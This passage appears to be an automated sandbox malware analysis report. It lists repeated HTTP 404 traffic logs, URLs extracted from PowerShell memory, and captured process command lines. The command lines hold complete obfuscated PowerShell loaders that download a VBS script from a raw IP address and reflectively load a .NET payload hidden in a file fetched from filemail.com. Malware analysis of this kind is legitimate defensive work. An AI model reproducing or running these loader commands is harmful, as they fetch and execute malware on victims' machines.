                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/
                Source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/32/seemybes
                Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimU&
                Source: powershell.exe, 00000001.00000002.2204058634.000000000741E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF
                Source: powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFility
                Source: powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFon
                Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/cate
                Source: powershell.exe, 00000001.00000002.2192280720.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000009.00000002.2379784762.0000000006C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microG
                Source: powershell.exe, 00000003.00000002.2088278913.0000000007FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004F56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                Source: powershell.exe, 00000009.00000002.2324609506.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT
                Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                Source: powershell.exe, 00000009.00000002.2380660733.0000000006D11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt
                Source: powershell.exe, 00000007.00000002.2713596116.0000000004F36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
                Source: powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.2204284614.00000000074C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.5:49705 version: TLS 1.2

                System Summary

                barindex
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
